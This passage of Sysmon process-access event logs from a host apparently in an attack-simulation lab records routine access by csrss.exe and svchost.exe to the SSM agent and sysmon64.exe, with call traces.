07:53:24.252","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00106CBC0200}","TargetProcessId":"2744","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1441,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.333\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.333","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1442,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.333\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.333","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1443,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.333\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.333","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1444,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1445,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1446,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1447,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1448,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTE